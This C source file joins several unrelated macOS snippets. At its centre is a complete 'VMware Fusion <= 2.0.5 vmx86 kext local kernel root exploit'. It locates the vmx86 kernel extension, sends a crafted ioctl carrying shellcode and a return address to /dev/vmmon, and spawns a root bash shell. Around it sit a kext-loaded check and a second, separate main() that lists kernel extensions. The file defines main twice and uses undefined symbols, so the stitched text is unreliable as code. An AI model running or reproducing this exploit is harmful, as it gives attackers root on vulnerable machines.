static int
kextisloaded(char * kextname)
{
mach_port_t kernel_port;
kmod_info_t *k, *loaded_modules = 0;
int err, loaded_count = 0;
/* on error return not loaded - to make loadsmbvfs fail */
err = task_for_pid(mach_task_self(), 0, &kernel_port);
if (err) {
fprintf(stderr, "%s: %s: %s\n", __progname,
"unable to get kernel task port",
mach_error_string(err));
return (0);
}
err = kmod_get_info(kernel_port, (void *)&loaded_modules,
&loaded_count); /* never freed */
if (err) {
fprintf(stderr, "%s: %s: %s\n", __progname,
"kmod_get_info() failed",
mach_error_string(err));
return (0);
}
for (k = loaded_modules; k; k = k->next ? k+1 : 0)
if (!strcmp(k->name, kextname))
return (1);
return (0);
}
int
main (int argc, char **argv)
{
kmod_info_t *kmod_list, *k;
mach_port_t host_port;
kern_return_t mach_r;
struct ioctl_req req;
unsigned int count;
int shell_addr;
int fd, id, i, r;
printf ("VMware Fusion <= 2.0.5 vmx86 kext local kernel root exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
host_port = mach_host_self ();
mach_r = kmod_get_info (host_port, (void *) &kmod_list, &count);
if (mach_r != KERN_SUCCESS)
{
fprintf (stderr, "* couldn't get list of loaded kexts from kernel - %s\n",
mach_error_string (mach_r));
exit (EXIT_FAILURE);
}
for (k = kmod_list; k; k = (k->next) ? (k + 1) : NULL)
if (strcmp (k->name, "com.vmware.kext.vmx86") == 0)
break;
if (k == NULL)
{
fprintf (stderr, "%s: vmx86 kext not loaded?\n", argv[0]);
exit (EXIT_FAILURE);
}
for (i = 0; targets_t[i].name; i++)
if (strcmp (targets_t[i].name, k->version) == 0)
{
shell_addr = targets_t[i].shell_addr;
break;
}
if (targets_t[i].name == NULL)
{
fprintf (stderr, "%s: unsupported vmx86 version found :( [%s]\n",
argv[0], k->version);
exit (EXIT_FAILURE);
}
printf ("* kmod: %s, version: %s, addr: 0x%08X -> 0x%08X\n",
strrchr (k->name, '.') + 1, k->version, (int) k->address, (int) (k->address + k->size));
printf ("* ret addr: 0x%08X + 0x%08X = @0x%08X\n",
(int) k->address, shell_addr + 0x1000, (int) k->address + shell_addr + 0x1000);
fd = open ("/dev/vmmon", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: open failed\n", argv[0]);
exit (EXIT_FAILURE);
}
memset (&req, 0xCC, sizeof req);
memcpy (&req.pad, zleopard, sizeof zleopard - 1);
*(unsigned int *) &req.pad[0x21] = k->address + shell_addr + 0x1000;
printf ("* hitting...");
fflush (stdout);
sleep (2);
r = ioctl (fd, VMX86_INIT_IOCTL, &req);
printf ("done\n\n");
close (fd);
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
char *args[] = { "/bin/bash", NULL };
printf ("+Wh00t\n\n");
execve (args[0], args, NULL);
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
/*
* int main(int argc, const char * argv[])
*/
int main(
int argc, const char * argv[])
{
kern_return_t k_ret;
kmod_info_array_t list;
mach_msg_type_number_t b = 0;
int cnt = 0;
kmod_info_t *m;
mach_port_t host = mach_host_self();
int c,i = 0 ,j = 0 ,vA = 0 ,vB = 0 ,vC = 0 ,vD = 0 ,h = 0, isopt = 0, print = 1;
if(argv[0]) { progname = (char *)getprogname(); }
while ((c = getopt(argc, (char **)argv, "vskuh")) != -1)
{
switch(c) {
case 'v':
vA = 1;
break;
case 's':
vB = 1;
break;
case 'k':
vC = 1;
break;
case 'u':
vD = 1;
break;
case 'h':
h = 1;
break;
case '?':
default:
goto USAGE;
}
++isopt;
}
if(!isopt || h)
goto USAGE;
k_ret = kmod_get_info(host, (void *)&list, &b);
mach_port_deallocate(mach_task_self(), host);
if(k_ret != KERN_SUCCESS) {
exit(EXIT_FAILURE);
}
cnt = kmod_info_array_count(list);
kmod_info_array_sort(list,(size_t) cnt);
if(!list || 0 > cnt)
exit(EXIT_FAILURE);
if(vA || vC || vD) {
puts(" ID \t REFS\t ADDRESS \t SIZE \t\t WIRED \t\t NAME");
} else if(vB)
puts(" ID \t NAME");
do
{
m = (kmod_info_t *) &(list[i]);
if(vA || vC || vD) {
if(vC && (m->size - m->hdr_size) == 0x0)
print = 0;
else if(vD && (m->size - m->hdr_size) != 0x0)
print = 0;
else
print = 1;
if(print) {
printf(
"%5d \t %4d \t %-10p \t %-10p \t %-10p \t %s (%s)\n",
m->id,
m->reference_count,
(void *) m->address,
(void *) m->size,
(void *) (m->size - m->hdr_size),
m->name,
m->version
);
++j;
}
} else if(vB) {
printf("%5d \t %s (%s)\n", m->id, m->name, m->version);
++j;
}
} while (cnt > ++i);
vm_deallocate(mach_task_self(),(vm_address_t)list,b);
if(!j) {
printf("%5d \t %4d \t %-10p \t %-10p \t %-10p \t %s (%s)\n",-1, 0, (void *) 0x0, (void *) 0x0, (void *) 0x0, "com.apple.ZeroDriverFound","None");
exit(EXIT_FAILURE);
}
goto SUCCESS;
USAGE:
usage();
SUCCESS:
return EXIT_SUCCESS;
}
